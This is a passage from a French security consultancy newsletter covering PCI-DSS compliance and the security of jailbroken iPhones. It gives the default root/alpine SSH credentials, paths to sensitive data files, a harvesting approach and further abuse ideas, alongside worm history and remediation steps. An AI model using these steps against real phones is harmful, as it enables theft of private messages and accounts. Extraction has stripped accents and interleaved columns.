Vous êtes sur la page 1sur 48

LACTUSCU 24

PCI-DSS, LES VULNRABILITS SSL ET LA SECURITE DES


IPHONES

S OM M AIR E
PC I DS S : l e s entreprises franaises de plus en plus concer nes...

i P h on e de plus en plus convoit par les pirates : Prsentation de s


pre m i e r s v i r u s a ff e c tant les iPhones jailbreaks

S S L m i s m al : Retour sur les vulnrabilits SSL des der niers mois

L a ct u a li t d u mois : Attaq ues de Phishing OWA, SMBv2 et d n i d e


s erv i ce s ou s W i nd o ws 7, 0-day IIS, les confrences scurit...

Les blogs , logic ie ls e t e x te n s i o n s s c u r i t . . .

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [1]
LACTU SCU N24

Tests d'intrusion
Mise l'preuve de vos rseaux, systmes et applications web par nos experts en intrusion
Utilisation des mthodologies OWASP, OSSTMM, CCWAPSS

Audit de scurit
Audit technique et organisationnel de la scurit de votre Systme d'Information
Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley

Veille en vulnrabilits
Suivi personnalis des vulnrabilits et des correctifs affectant votre Systme d'Information

Rponse intrusion
Dtection et diagnostic d'intrusion, collecte des preuves, tude des logs, autopsie de malware

Vo u s t e s c o n c e r n p a r l a s c u r i t i n f o r m a t i q u e d e v o t r e e n t r e p r i s e ?

Xmco Partners est un cabinet de conseil dont le mtier est l'audit en scurit informatique.

propos du cabinet Xmco Partners

Fond en 2002 par des experts en scurit, dirig par ses fondateurs, nous n'intervenons que sous forme de projets
forfaitaires avec engagement de rsultats.

Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent les axes majeurs de dveloppement
de notre cabinet.

Paralllement, nous intervenons auprs de Directions Gnrales dans le cadre de missions daccompagnement de
RSSI, dlaboration de schma directeur ou encore de sminaires de sensibilisation auprs de plusieurs grands
comptes franais.

Pour contacter le cabinet Xmco Partners et dcouvrir nos prestations : http://www.xmcopartners.com/


WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [2]
LEDITO Bonne anne 2010!
N U M R O2 4

Extrait de Encyclopdie Historique du d'accder cette gigantesque source conjugaison, d'orthographe ou de


22e sicle, dat du 20 dcembre 2109 d'informations. l'issue de l'incident de concordance des temps. On appelle
Transcription directe de la mmoire, 2073 au cours duquel tous les disques galement le 4e groupe, "groupe
avec correction orthographique, durs ont t effacs, il a t dcid de fonetik")
grammaticale intgre, version mettre en place un systme de backup J'ai retrouv des documents sympas,
25.5.revB et traduction simultane en p e r f o r m a n t p o u r l e D a t a c e n t e r. des photos, mais au final, pas grand-
langage universel. Emission broadcast Diffrents audits avaient dj voqu le chose, compte tenu de la taille ridicule
ds la disponibilit d'un slot sur le risque de perte de donnes au sein du du disque, 1 To.
Backbone. Export natif dans mon Datacenter, mais les budgets avaient Aujourd'hui, n'importe quel fone
portail Xframe. Validation ADN- Iris. rgulirement t arbitrs, et le projet comporte de base 200 To en Raid1 !
repouss puisqu'aucun incident srieux ( U n "Fo n e " e st u n a p p a r e i l d e
"Je profite de cette fin d'anne 2109 n'avait jamais eu lieu. Cet incident a communication universel, connect au
pour me pencher sur notre histoire et vraiment t dcisif pour faire prendre datacenter en permanence, et en
essayer de mieux connatre nos conscience de ce risque aux autorits interaction temps rel avec le cerveau
anctres du 21e sicle. comptentes. humain depuis qu'un gnie a trouv
Je le sais, certains vont sourire J'ai perdu quelques prcieuses l'algorithme de fonctionnement du
recevant mon billet dans leur funslot secondes balayer l'ensemble des cerveau)
(NDLR : en 2109, tout le monde algorithmes de chiffrement sur le Enfin bref, j'ai pass 7 secondes
dispose d'un support de masse disque, avant, btement, de tester de parcourir toute l'arborescence du
intelligent, en connexion directe avec le lire les donnes directement. Bingo !!! disque, avant d'envoyer cette relique au
cerveau, dont les diffrentes partitions Les donnes taient stockes en service archologique du Datacenter.
s'appellent "Slots"). Je viens de clair !!! Les inconscients... J'espre En y repensant, je n'ai pas russi
retrouver un drle d'objet dans mon qu'ils n'taient pas nombreux ne pas comprendre ce qui pouvait conduire
grenier. a ressemble un parpaing, chiffrer leurs disques durs... J'ai donc mes anctres ngliger autant la
mais d'aprs les diffrentes pu retrouver tous leurs identifiants, protection de leurs donnes
informations que j'ai pu recueillir au banque, assurance, "ebusiness", j'ai personnelles, ils devaient vivre dans
Datacenter, il s'agirait d'un Disque Dur tout !!!!! C'est vraiment super drle. Et l'inconscience la plus totale... J'en ai
datant de 2009 qui appartenait un de le plus dingue : ils avaient un fichier parl avec mes parents, et j'ai appris
mes arrire-grands-parents !!! a fait dans lequel ils inscrivaient leurs mots que la scurit des systmes
vraiment tout drle de voir ce qu'ils de passe en clair. (Pour les plus jeunes d'information avait mis du temps
appelaient "Disque Dur" !! 1 Tera octet d'entre-vous, qui n'ont connu que la devenir systmatique, et que ce n'tait
pour presque 1 kg, les pauvres, ils validation ADN, sachez qu'avant, pour qu' partir de 2096, qu'une vritable
devaient avoir des physiques de s'identifier et s'authentifier, ils utilisaient volont politique avait conduit intgrer
dmnageurs cette poque.... C'est des identifiants, associs des mots la scurit dans l'ensemble des
vraiment dommage que le Datacenter de passe, pour se connecter aux systmes des tats et des entreprises...
ait subi cet incident en 2073 et qu'on ait systmes informatiques). Vous vous Pile un sicle aprs l'explosion
perdu toutes les photos antrieures rendez compte ? Ils "peer-2peerait" d'Internet et la mondialisation des
cette date. avec des fichiers de mot de passe sur changes informatiques...
(NDLR : en 2109, l'ensemble des leurs disques.... ! (le verbe peer-2-peer Dun autre ct, un sicle, l'chelle de
donnes du monde se trouve dans un a t intgr au dictionnaire Wikipedia, l'humanit, c'est pas grand-chose
unique datacenter, emettant en en 2028, sous la pression des lobby finalement...."
WimgaMax, une norme, dont les internautes, et est considr comme un
caractristiques de dbit et de porte verbe du 4e groupe. Le 4e groupe a t Marc Behar
permettent l'ensemble des habitants introduit en 2026. Les verbes du 4e
de la voie lacte de communiquer et groupe ne respectent aucune rgle de Directeur du cabinet

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [3]
SOMMAIRE

PCI et les entreprises franaises..................5

P. 5 Rappel de la norme PCI.

iPhone jailbreaks et scurit.......................8

IPHONE, SECURIT ... Petit tat des lieux sur la scurit des iPhones et
les virus rcemment publis.

ET SSL est t-il dpass.....................................17

P. 8
Retour et explications des diffrentes failles qui

JAILBREAK ont touch le protocole SSL.

LActualit scurit du mois........................29

SSL EST-IL P. 17 Analyse des vulnrabilits et des tendances du


moment.

DEPASS ? Les bookmarks, logiciels et extensions


scurit...............................................................43
Zdnet security, www.ssllabs et Backend Software
Informations

LACTU DU MOIS P. 29
NOUS CONTACTER...
Commentaires :
actu_secu@xmcopartners.com

Rdacteur en chef :

BOOKMARKS ET
adrien.guinault@xmcopartners.com

EXTENSIONS
Contributeurs ;
fcharpentier@xmcopartners.com
yannick.hamon@xmcopartners.com

P. 43
francois.legue@xmcopartners.com
linmiang.jin@xmcopartners.com

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [4]
LACTU SCU N24

Les entreprises franaises


PCI-DSS ET LES ENTREPRISES rattrapes par le PCI-DSS
FRANCAISES Le PCI DSS nest plus prsenter. La
littrature sur le web est abondante
son sujet, mais demeure thorique et
exempte dexprience relle
dapplication pratiques dans des
entreprises.

Cet article ouvre une suite de


plusieurs articles o je tenterai de
partager aux mieux des aspects du PCI
DSS que jai pu appliquer lors de mes
missions en tant quauditeur.

Ce premier article sattache


prsenter le standard dans le contexte
franais et ventiler les contrles
selon des axes rellement parlant pour
le RSSI.

Frdric CHARPENTIER

XMCO | Partners

La France en retard...
La seconde raison est que les banques franaises se
reposent sur le GIE Cartes Bancaires et son rseau e-
Le standard de scurit informatique PCI DSS, bien
rsb en charge de traiter des oprations par carte bleue.
connu des entreprises anglo-saxonnes, est rest
anecdotique pour les e-commerants franais. La
En effet, en France, la banque acqureur ne traite pas
diffusion de la rglementation PCI DSS est tablie
directement avec VISA ou Mastercard. Lorsque la
selon un principe pyramidale. Le consortium VISA/
banque mettrice de la carte est franaise, la
Mastercard impose le standard aux banques, qui
transaction est traite par le rseau des e-rsb sans
doivent leur tour l'imposer leurs clients e-
passer par le rseau VISA ou Mastercard.
commerants et fournisseurs de services de paiement.

La rgle dapplication est simple : chaque systme


informatique par lequel transite des numros de carte
de crdit, mme sans les stocker, doit se mettre en
conformit avec le PCI DSS et le dclarer auprs de la
WWW.XMCOPARTNERS.COM
banque acqureur.
Dans le monde anglo-saxon, les banques ont t
actives et imposent depuis plusieurs annes le
standard PCI DSS leurs clients (anciennement appel
programme VISA AIS). Pour plusieurs raisons,
lapplication de ce standard de scurit informatique
dans les entreprises franaises a t lgrement
bloque.

La premire raison est que les banques franaises se


sont senties moins concernes ou plutt protges par
le systme des cartes puce EMV, (qui rappelons-le ne
scurise pas les achats sur Internet pour le moment).

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [5]
PCI ET LES ENTREPRISES FRANCAISES LACTU SCU N24

Des contraintes business poussent au PCI-DSS Une compliance pluri-disciplinaire

Mais aujourd'hui nous constatons, dans le cadre de nos Le standard PCI est, en effet, peu connu. Au-del des
missions, que les entreprises franaises qui font du e- contraintes d'implmentations techniques de logiciels
commerce sont confrontes au PCI DSS, mais par une de scurit ou de renforcement des authentifications, le
autre voie que celle de la banque acqureur qui leur standard demande galement la mise en place des
imposerait le standard. processus organisationnels, la rdaction de
Les entreprises franaises sont rattrapes par leur documentations prcises et l'audit rgulier des
propre service marketing qui constate que leurs clients systmes.
et leurs prospects trangers leur demandent "d'tre PCI
DSS". Car, comme limpose le standard PCI DSS, les Pour aider les entreprises dans cette situation, il nous
entreprises certifies qui partagent des informations de semble ici important dillustrer le standard PCI DSS
cartes avec une autre entreprise (ventes lies, selon plusieurs points de vue.
partenaire e-commerce) doivent sassurer que leur Tout dabord, une rpartition des 201 contrles du PCI
partenaire est galement conforme. Ainsi, beaucoup DSS en fonction de lacteur qui devra les mettre en
d'entreprises qui n'avaient pas t jusqu'alors place : responsable systme, tudes, hbergement,
rellement inquites par le PCI DSS se voient maitrise douvrage et SSI:
contraintes dans une situation o elles doivent
rapidement dbuter une mise en conformit avec le PCI
car cela devient une condition pralable la signature
de contrats de partenariat.

Ce qui peut tre impute la responsabilit de la


production informatique et des systmes ne reprsente
que de 50% des contrles.

Ensuite, une rpartition des 201 contrles en fonction


de leur nature : sagit-il dune configuration particulire
dun logiciel, de limplmentation dune technologie
supplmentaire et de limplmentation dun contrle
dans le code source des programmes, sagit-il dun
processus organisationnel mettre en place en interne
ou sagit-il dun audit de scurit raliser?
WWW.XMCOPARTNERS.COM

Dans cette situation, les entreprises cherchent des


moyens pour adresser rapidement ce nouveau
problme. Or, la mconnaissance du standard laisse
croire quil ne sagit que dune simple histoire
d'hbergement de leurs serveurs dans un datacenter
certifi PCI DSS avec l'installation de quelques logiciels
de scurit comme un firewall applicatif (WAF).

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [6]
PCI ET LES ENTREPRISES FRANCAISES LACTU SCU N24

doivent donc tre intelligemment rpartis dans un


Nous constatons ici que le PCI DSS est autant de projet de conformit PCI DSS, avec une roadmap
nature organisationnelle et documentation que claire pour tous les acteurs du projet.
purement technique.

Il y a environ 201 contrles diffrents dans le PCI DSS,


chacun dentre eux prsente la mme valeur du point
de vue de lauditeur et la certification n'est obtenue que
si tous les contrles sont satisfaits.

INFO
Heartland Payments systems et PCI...

Le PCI-DSS impose donc un certain nombre


de contrles afin de garantir une
scurit optimale. Cependant, quelques
affaires ont branl et remis en cause
cette standard.

En effet, au mois de janvier 2009,


Heartland Payments a subi une attaque
permettant aux pirates de mettre la main
sur plusieurs millions de numros de
cartes bancaires...

HeartLand, qui avait t audite, tait


dclare "PCI-DSS"... Cependant, il est
probable que les responsables
d'Heartland n'aient pas continu de
suivre le processus de scurit qui doit
tre mis en place tout au long de
l'anne qui suit la certification...

Les marchands sont tenus d'auditer


rgulirement et de maintenir jour
WWW.XMCOPARTNERS.COM

leurs systmes et ne pas uniquement se


reposer sur la certification acquise...

Conclusion

A la vue de ces graphiques, les entreprises seront


plus vigilantes l'gard du discours commercial
des vendeurs de logiciels de compliance PCI
DSS : mme si un logiciel ou une appliance
satisfait une ou deux exigences du PCI DSS, il en
restera 199 adresser. Le budget et les efforts

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [7]
LACTU SCU N24

L'IPHONE ET LE Les iPhones pris pour cible

JAILBREAK
Aprs plus de deux ans d'existence,
l'iPhone est devenu peu peu un
smartphone incontournable. Qui n'a pas
un ami ou un collgue "iphone addict"
qui, chaque jour, vous nerve en vous
prsentant la dernire application
la mode...

Depuis la sortie de l'iPhone 3G, les


ventes explosent jusqu' atteindre 7
millions d'units vendues au dernier
trimestre.

Avec un tel essor et plus de 90 000


applications dsormais accessibles
depuis l'AppStore, les pirates se sont
vite intresss aux utilisations
dtournes de l'iPhone afin d'en faire
un smartphone quasiment "libre" grce
au fameux "Jailbreak".

De nombreux utilisateurs, attirs par


les applications gratuites et les
autres possibilits, ont rapidement
t tents par le dblocage logiciel
mais non sans risque. Explications...

Nicolas KERSCHENBAUM
Adrien GUINAULT

XMCO | Partners

Prsentation

Apple, avec son iPhone, a sduit un large public dans Le jailbreak, ou comment dverrouiller son
le domaine des tlphones portables. Ses innovations iPhone
et son ergonomie en on fait une rfrence en la
matire. Quelques mois aprs la sortie de l'iPhone, le terme
"Jailbreak" a commenc faire le buzz sur internet. Les
Bas sur un systme d'exploitation BSD, l'iPhone tait premires versions de l'iPhone sont tombes les unes
cens rester une bote noire difficilement piratable. aprs les autres ouvrant ainsi le coeur du tlphone.
Contrairement aux Google Phone qui permettront
tous de dvelopper des applications, Apple n'a pas
souhait ouvrir son systme pour le dveloppement
WWW.XMCOPARTNERS.COM
d'applications tierces. En effet, toutes les applications
dveloppes sont contrles et valides par Apple.

Trs rapidement, plusieurs groupes de pirates ont donc


tudi quelles taient les protections mises en place
par Apple. Ces derniers ont trouv une solution pour
obtenir un accs total au tlphone et donc l'OS BSD
dans le but de pouvoir modifier souhait le systme.

Le terme "jailbreak" est donc n le jour o un utilisateur


a russi modifier le bootloader et les droits d'criture
de la partition systme root permettant de modifier
volont le systme d'Apple...

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [8]
L'IPHONE CONVOITE PAR LES PIRATES LACTU SCU N24

Les pirates ont pu tudier en dtail le systme Les possibilits offertes par le jailbreak sont maintenant
d'exploitation et trois jours ont suffi pour dterminer le nombreuses : installation de nouveaux thmes,
mot de passe associ aux comptes systme "root" et tlchargement de toutes les applications gratuites,
"mobile" (alpine). Le test a t reproduit avec une installation d'applications non valides par Apple,
machine de base et les hashs tombent utilisation du tlphone comme disque dur externe ou
instantanment... encore comme modem via la connexion 3G. Bref une
opration incontournable pour tous les geeks en
herbe...

En France prs de 8% des iPhones sont


jailbreaks...

Face cette recrudescence d'outils et donc de


tlphones jailbreaks, Apple tente de stopper par tous
les moyens cette activit, et vient de placer sur son site
internet une offre demploi pour un ingnieur spcialis
en scurit afin de garantir la scurit de son systme.

Ce mot de passe par dfaut est dailleurs toujours http://jobs.apple.com/index.ajs?


utilis sur les modles vendus en magasin. On se BID=1&method=mExternal.showJob&RID=42223&Curr
demande toujours pourquoi Apple n'a pas utilis un entPage=1
compte avec un mot de passe impossible casser...

Les premiers jailbreak taient exclusivement rservs


aux utilisateurs avertis et expriments qui n'avaient
pas froid aux yeux. Une mauvaise manipulation et
s'tait la perte de la garantie voire du tlphone!

Aujourd'hui, de nombreux outils ont simplifi la donne.


Dsormais, cette opration est devenue simple et la
porte de tous avec l'utilisation de nombreux outils
comme Yellowsn0w, QuickPwn, PwnageTool, Redsnow
ou encore Ultrasn0w.

Une quipe de pirate dnomme la DEV-TEAM, sest


dailleurs spcialise en la matire, se faisant un malin
plaisir anantir chaque fois les protections mises en
place par les quipes dApple.
WWW.XMCOPARTNERS.COM

En France, on compte dsormais pas moins de 8%


d'iPhone jalibreaks sur le march daprs le sondage
ralis par la socit Pinch Media.

Rappelons tout de mme que cette opration est


strictement illgale puisquelle viole le copyright
appos sur les programmes du systme dexploitation.
Apple dnonce dailleurs cette pratique et annule la
garantie de lappareil si une telle opration tait
dtecte lors de la rparation du tlphone.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [9]
L'IPHONE CONVOITE PAR LES PIRATES LACTU SCU N24

Le jailbreak peut-il nuire la scurit de Les iPhone sont quips d'un serveur OpenSSH 5.2 ce
liPhone ? qui donne une piste sur les ventuelles cibles
vulnrables...
La rponse est bien videmment OUI et vous allez
comprendre pourquoi.

Comme nous le disions prcdemment, les nombreux


outils publis pour jailbreaker ont considrablement
facilit cette opration. De plus, afin de simplifier encore
plus son utilisation et doffrir l'accs toutes les
fonctionnalits du jailbreak, la plupart des outils cits
intgrent une application nomme "Cydia" qui installe
par dfaut un serveur SSH.

Vous l'avez peut-tre compris : un serveur SSH activ


par dfaut et des comptes utilisateurs connus de tous,
et nous voil confront un vritable problme de
scurit...

Serveur SSH + compte utilisateur par Il est alors possible de se connecter via le protocole
dfaut = iPhone jailbreak la merci des SSH et rcuprer l'intgralit du contenu du
tlphone...
pirates!...

Ainsi, lorsquun iPhone jailbreak se connecte un


hotspot Wi-Fi, lensemble des utilisateurs connects sur
ce mme point daccs est donc en mesure
dadministrer liPhone en se connectant sur le serveur
SSH grce ces identifiants par dfaut.

WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [10]
L'IPHONE CONVOITE PAR LES PIRATES LACTU SCU N24

L'iPhone et les fichiers sensibles titre dexemple, il est possible de rcuprer les SMS
reus par un utilisateur possdant un iPhone jailbreak.
Une fois qu'un pirate possde un accs sur un iPhone,
ce dernier peut sa guise parcourir le systme de
fichiers la recherche d'informations sensibles.
iPhone-de-ad:~ root# ls /private/var/mobile/Library/
SMS/

La majorit des informations sensibles


Drafts/ Parts/ sms-legacy.db sms.db

(SMS, contacts, emails...) sont stockes au


sein de fichiers .plist ou .db...
Le contenu des SMS est visualisable en important le
SMS, contacts de lutilisateur, photos, emails...bref, tout fichier sms.db depuis un client SQLite comme le
peut tre rcupr par le pirate puis consult en mode montre la capture ci-dessous:
"off-line". La majorit des informations se trouve au sein
de fichiers XML (.plist) ou de fichiers .db (ou .sqlitedb)
correspondant des bases de donnes SQLite.

La liste suivante recense les principales informations


sensibles quil est possible de rcuprer sur un iPhone:

INFORMATIONS CHEMIN DACCS


Les cookies de Safari sont quant eux stocks au sein
Notes /private/var/mobile/ du fichier
Library/Notes/notes.db
/private/var/mobile/Library/Cookies/
Cookies.plist
Calendrier /private/var/mobile/
Library/Calendar/
Calendar.sqlitedb En utilisant ce fichier avec un diteur de texte, il devient
possible dusurper lidentit de la victime sur un
Contacts /private/var/mobile/ domaine spcifique.
Library/AddressBook/
AddressBook.sqlitedb Lexemple suivant permet par exemple de rcuprer un
des cookies utiliss par Google.
Appels /private/var/mobile/
tlphoniques Library/CallHistory/
call_history.db

SMS /private/var/mobile/
Library/SMS/sms.db

Mails /private/var/mobile/
WWW.XMCOPARTNERS.COM

Library/Mail/*/INBOX/
Messages/*.emlxpart

Cookies /private/var/mobile/
(Safari) Library/Cookies/
Cookies.plist

Historique de /private/var/mobile/
navigation Library/Safari/
(Safari) History.plist

Photos /private/var/mobile/Media/
DCIM/*.*

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [11]
L'IPHONE CONVOITE PAR LES PIRATES LACTU SCU N24

Un programme permettant de rcuprer ces Dans le cas o le serveur SSH serait accessible, il va
informations de faon automatique? tenter de sy connecter avec les identifiants par dfaut
de liPhone (root/alpine).
Ce problme de scurit, identifi il y a 2 ans, vient tout
juste d'intresser les pirates comme nous l'expliquerons Une fois la connexion russie, le programme va
dans le prochain paragraphe avec le dveloppement de rcuprer lensemble des informations sensibles
virus et de vers. savoir : les notes, le calendrier, les contacts enregistrs,
Peu de papiers ou d'outils ciblant spcifiquement les les derniers appels tlphoniques mis, les SMS, les
donnes des utilisateurs d'iPhone ont t diffuss sur cookies du navigateur Safari, et enfin les sites visits
Internet. depuis le navigateur safari.

La rcupration manuelle de lensemble de ces


fichiers peut tre fastidieuse. Mais quelques
minutes et quelques lignes de scripts suffisent
raliser l'attaque automatique ...

Au mois d'octobre, Laurent Rmi (http://


blog.madpowah.org/) avait dvelopp un petit script
pour rcuprer rapidement quelques informations
sensibles. Nous avons donc rutilis cette base afin
de pouvoir rcuprer l'ensemble des informations
qui nous intressent...

Un programme permettant
d'identifier et de rcuprer les
informations des iPhones jailbreaks
sur un rseau Wifi peut tre dvelopp
en quelques minutes...
Ce programme, dvelopp en Python, va tout
dabord scanner les appareils connects sur le
mme rseau et tester si le service SSH est activ.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [12]
L'IPHONE CONVOITE PAR LES PIRATES LACTU SCU N24

En quelques minutes, le programme rcupre Les autres malversations possibles...


lensemble des informations accessibles sur les
iPhones connects sur le mme rseau. Les malversations qui seraient ventuellement
possibles pourraient avoir des consquences bien plus
importantes. Nous n'avons pas eu le temps de creuser
dans ce sens, mais il serait certainement possible de
placer un certificat root au sein du navigateur Safari et
ainsi raliser des attaques Man In The Middle SSL ou
de phishing sans tre dtect.

Il serait galement intressant de placer une application


(cf SpyPhone) sur chaque tlphone compromis qui se
lancerait en fond de tche chaque dmarrage, et qui
scannerait son tour les priphriques connects sur le
rseau actuel, afin de voler leurs donnes et de les
infecter leur tour en y plaant lapplication malicieuse.
Les fichiers vols pourraient ensuite tre envoys au
pirate par mail. Ces oprations, totalement
transparentes pour lutilisateur, nveillerait pas ses
soupons...

Il serait galement possible denvoyer de nombreux


SMS surtaxs partir du tlphone compromis pour
gnrer des revenus rapides et consquents.

Bref, les possibilits sont nombreuses...

Voici lensemble des fichiers drobs enregistrs par le


programme.

INFO
Une application SPyPhone vole les donnes
stockes au sein de l'iPhone
Un chercheur suisse vient de dvelopper
une application pour iPhone capable de
rcuprer des informations confidentielles
sur des iPhone jailbreaks ou non.

Baptise SpyPhone, l'application lance en


fond de tche, permet de voler des
Le vol d'informations sensibles pourrait tre tendu aux informations sensibles (mots de passe,
photos, emails... mais cette opration prendrait plus de carnet d'adresses, emails...).
temps. Aucune vulnrabilit n'est exploite par
cette application qui n'utilise que des
fonctionnalits offertes par l'API fournie
par Apple.
Il est vident que cette application ne
sera ni valide ni disponible sur le site
de tlchargement d'applications de
l'AppStore. Reste savoir si un jour une
application de ce type n'chappera pas aux
contrles attentifs d'Apple pour s'y
retrouver comme ce fut le cas dans le
pass.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [13]
L'IPHONE CONVOITE PAR LES PIRATES LACTU SCU N24

Et les vers dans tout a?


Ikee
iHacked
Sen est suivi du premier ver pour iPhone, dnomm
Cette faille de scurit na pas chapp aux pirates. Ikee. Ce dernier, dont la source en C a t
Mais on peut constater qu'il a fallu deux ans pour que publiquement dvoile, modifiait lui aussi le fond
des virus soient publis. dcran du tlphone, mais supprimait en plus le
En effet, depuis quelques semaines, de nombreux service SSH.
programmes malicieux ont fleuri sur Internet. Le fond dcran mis en place affichait au dpart une
photo de la vedette pop des annes 80 Rick Astley
Les premiers programmes ntaient pas encore trs avec le commentaire ikee is never going to
aboutis, tel iHacked, qui ne se contentait que de give you up.
modifier le fond dcran et dafficher une fentre popup
indiquant lutilisateur que son tlphone avait t
compromis.

Depuis quelques semaines, de nombreux


programmes malicieux ont fleuri sur
Internet....

Lutilisateur tait incit visiter la page web du pirate


demandant alors 5$ afin dobtenir le mode opratoire
pour scuriser son tlphone jailbreak.

Quatre variantes de ce ver ont t dveloppes par la


suite. Les trois premires napportaient gure de
grandes modifications puisquil sagissait principalement
du changement de la photo de fond dcran install lors
des prcdentes versions.

INFO
WWW.XMCOPARTNERS.COM

Les iPod Touch galement pris pour cible...


Les iPhones ne sont pas les seuls
appareils vulnrables cette attaque.
En effet, les iPod Touch possdent
galement une connexion Wi-Fi et peuvent
Assez rapidement, lauteur de cette malversation sest eux aussi tre jailbraks.
Ils nont donc pas t pargns par ces
excus pour le dsagrment et sest engag
diffrents vers.
rembourser ses victimes tout en fournissant
gratuitement les mesures entreprendre.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [14]
L'IPHONE CONVOITE PAR LES PIRATES LACTU SCU N24

La dernire variante (D), quant elle, tait plus furtive Ikee.B dit Duh
et donc plus complique supprimer. Celle-ci tait
dissimule au sein des fichiers systmes du tlphone. Baptis Duh ou encore Ikee.B, il intgrait
lensemble des iPhones compromis au sein dun botnet
(rseau de machines compromises).
Les premiers programmes malicieux pour Son dveloppeur pouvait alors les contrler entirement
iPhone ntaient pas encore trs aboutis , et sa convenance du moment que les iPhones
tel iHacked, qui ne se contentait que de infects avaient un accs Internet (3G, Edge ou Wi-
Fi). Mais ce ver ciblait galement la banque ING
modifier le fond dcran...
(banker). Quand la page web de cette banque tait
demande depuis un iPhone, le ver redirigeait
Comme tout ver, Ikee possdait un dispositif afin de se automatiquement lutilisateur vers un site Internet
rpliquer et dinfecter dautres iPhones non scuriss. contrl par les pirates.

Ce site, reproduisant lidentique le site officiel de la


banque (Phishing) rcuprait les identifiants bancaires
soumis par les utilisateurs et les envoyait ensuite sur un

INFO serveur hberg en Lituanie.

Le ver poussait le vice encore plus loin en modifiant le


Le Jailbreak et le Dsimlockage mot de passe root au sein du fichier
La plupart des internautes confondent /etc/master.passwd
les termes Jailbreak et Dsimlockage. Le
Jailbreak permet uniquement Un utilisateur infect ne pouvait donc plus se connecter
d'outrepasser les restrictions mises en via le service SSH de son tlphone.
place afin de modifier sa guise l'OS.
Heureusement, le nouveau mot de passe ntait pas
Le dsimlockage est une opration trop complexe et seules quelques minutes ont suffi pour
diffrente permettant d'utiliser la casser le mot de passe (ohshit).
carte SIM d'un autre oprateur sur un
tlphone normalement bloqu un rseau
Sen est suivi un ver beaucoup plus offensif...
spcifique.

Le dsimlockage tait au dbut une


opration hardware mais dsormais

INFO
plusieurs logiciels permettent de
s'affranchir de cette restriction en
quelques secondes...

Aucun logiciel antivirus pour liPhone...


Tandis que les principaux systmes
dexploitation pour tlphone portable
Il utilisait la mme technique que celle lui ayant permis peuvent accueillir un logiciel
WWW.XMCOPARTNERS.COM
de compromettre le tlphone actuel, savoir les mots antivirus, ce nest toujours pas le cas
de passe par dfaut. Ainsi, il scannait son tour des pour liPhone.
plages dadresse IP dfinies afin de dcouvrir dautres
iPhones potentiellement vulnrables. Le dveloppement dun antivirus
ncessite une certaine coopration avec
lditeur du systme (ici Apple en
l'occurrence), qui pour le moment se
refuse cette ide puisquaucun virus
naffecte lIPhone.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [15]
L'IPHONE CONVOITE PAR LES PIRATES LACTU SCU N24

Comment se protger de ces attaques ?

Pour viter de vous faire piger par ce genre d'attaque,


plusieurs manipulations doivent tre effectues afin de
scuriser votre smartphone.
INFO
Le crateur du premier ver pour iPhone
Aprs la lecture de cet article, il est vident que le embauch pour dvelopper des applications...
Jailbreak n'offre pas une scurit optimale, c'est Ashley Towns, jeune Australien de 21 ans
pourquoi cette opration est dconseille... et crateur du premier ver (Ikee) pour
iPhone, vient d'tre engag par la
Malgr cela, pour certains, le jailbreak est devenu une socit Mogeneration afin de dvelopper
ncessit. Ds lors, il est important de vrifier que le des applications destines l'AppStore.
serveur SSH de votre iPhone est dsactiv de manire
permanente. Attention, sur le iPhones tests dans le Cest par le rseau communautaire
Twitter quil vient de dvoiler cette
cadre de cet article, la dsactivation manuelle du
information qui en a choqu plus dun.
serveur SSH via des plugins tels que SBSettings n'est
pas permanente. Ainsi, le serveur SSH sera de En effet, plusieurs experts en scurit
nouveau lanc lors du prochain dmarrage du sont outrs face la position de cette
tlphone..! socit qui, au lieu de laccabler,
vient de lui offrir un poste de
Il est donc primordial de modifier le mot de passe dveloppeur.
associ aux comptes root et mobile, qui est par dfaut Rappelons tout de mme que Ashley Towns
alpine. Pour cela, il suffit de se connecter en SSH sur na jamais prouv de remords quant la
liPhone (ou d'utiliser l'application Mobile Terminal) et diffusion de son ver. Il semble donc
d'utiliser la commande passwd : tre rcompens pour un acte
passwd root irresponsable...
passwd mobile

Un nouveau mot de passe vous sera demand pour


chacun des comptes.

Ces deux oprations vous permettront de vous


prmunir un minimum face ces attaques.

Conclusion

Les pirates arrivent sur un nouveau march en


ciblant les tlphones portables jailbreaks.
Webographie
Les rcents vers circulant sur Internet permettront,
esprons-le, de changer les habitudes des h t t p : / / i t h r e a t s . n e t / 2 0 0 9 / 11 / 2 6 / a n a l y s i s - o f -
WWW.XMCOPARTNERS.COM

utilisateurs qui laissent la plupart du temps les %E2%80%9Cduh%E2%80%9D/


mots de passe par dfaut sur leurs quipements, ce
qui peut tre dramatique. http://www.sophos.com/blogs/duck/g/2009/11/24/
clean-up-iphone-worm/
Nous ne pouvons encore prdire si dautres vers
verront prochainement le jour, cela dpendra http://blog.madpowah.org/archives/2009/10/index.html
fortement de la rentabilit observe par les pirates
avec ces premiers vers.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [16]
LACTU SCU N24

SSL EST-IL DEPASSE ? Retour sur les dernires


vulnrabilits SSL...

Depuis le mois d'aot, le


protocole SSL a subit une
succession d'attaques.

Que ce soit, au niveau du


traitement des certificats par
les navigateurs, ou encore
l'injection de donnes au sein de
communications, le protocole SSL
est dj considr par certains
comme obsolte.

Retour sur ces vulnrabilits...

Lin Miang JIN


XMCO | Partners

Intro
